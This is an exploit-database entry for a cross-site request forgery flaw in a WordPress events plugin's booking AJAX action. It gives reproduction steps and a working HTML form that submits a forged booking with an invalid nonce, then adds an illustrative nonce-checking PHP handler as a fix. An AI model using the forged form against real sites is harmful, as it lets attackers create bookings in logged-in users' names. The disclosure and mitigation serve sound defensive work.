## https://sploitus.com/exploit?id=WPEX-ID:CE564628-3D15-4BC5-8B8E-60B71786AC19
Create an Event, noting its ID. Add a ticket type to the Event (the details don't matter).

As a logged-in user, visit a page with the following form, replace the event ID, and submit the form. Note that a new Booking is created, despite the incorrect nonce.

```html
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="text" name="action" value="ep_save_event_booking" />
      <textarea name="data">
ep_event_booking_event_id=EVENT_ID&ep_event_booking_user_id=1&ep_event_booking_total_price=0&ep_event_booking_total_tickets=1&ep_save_event_booking_nonce=1234
      </textarea>
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
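For the defensive side, a handler for this AJAX action that rejects the request above would verify the nonce before touching any booking data. The following is an added example, not the plugin's own code: the function names and the nonce action string `example_save_event_booking` are assumptions, and only the AJAX action name and the field names are taken from the form above.

```php
<?php
// Added example (hypothetical names): nonce-checked handler for the
// "ep_save_event_booking" AJAX action shown in the form above.

add_action( 'wp_ajax_ep_save_event_booking', 'example_save_event_booking' );

/**
 * Parse and validate the URL-encoded "data" field.
 * Returns an array of validated values or a WP_Error.
 */
function example_verify_booking_request( $raw ) {
    parse_str( trim( $raw ), $fields );

    // 1. The nonce must be valid for the current user and this action.
    //    The form must emit it with wp_create_nonce( 'example_save_event_booking' ).
    $nonce = isset( $fields['ep_save_event_booking_nonce'] )
        ? sanitize_text_field( $fields['ep_save_event_booking_nonce'] )
        : '';
    if ( ! wp_verify_nonce( $nonce, 'example_save_event_booking' ) ) {
        return new WP_Error( 'bad_nonce', 'Invalid or missing nonce.', array( 'status' => 403 ) );
    }

    // 2. Only after the nonce check: validate the submitted identifiers.
    $event_id = isset( $fields['ep_event_booking_event_id'] )
        ? absint( $fields['ep_event_booking_event_id'] ) : 0;
    $tickets  = isset( $fields['ep_event_booking_total_tickets'] )
        ? absint( $fields['ep_event_booking_total_tickets'] ) : 0;
    if ( ! $event_id || ! get_post_status( $event_id ) || $tickets < 1 ) {
        return new WP_Error( 'bad_input', 'Unknown event or ticket count.', array( 'status' => 400 ) );
    }

    return array( 'event_id' => $event_id, 'tickets' => $tickets );
}

function example_save_event_booking() {
    $raw    = isset( $_POST['data'] ) ? wp_unslash( $_POST['data'] ) : '';
    $result = example_verify_booking_request( $raw );

    if ( is_wp_error( $result ) ) {
        $status = $result->get_error_data()['status'];
        // wp_send_json_error() ends the request, so no booking is created.
        wp_send_json_error( array( 'message' => $result->get_error_message() ), $status );
    }

    // The existing booking logic would run here, using only $result.
    wp_send_json_success( $result );
}
```

With this check in place, the form above, which submits the nonce value `1234`, receives a 403 response and no booking is created.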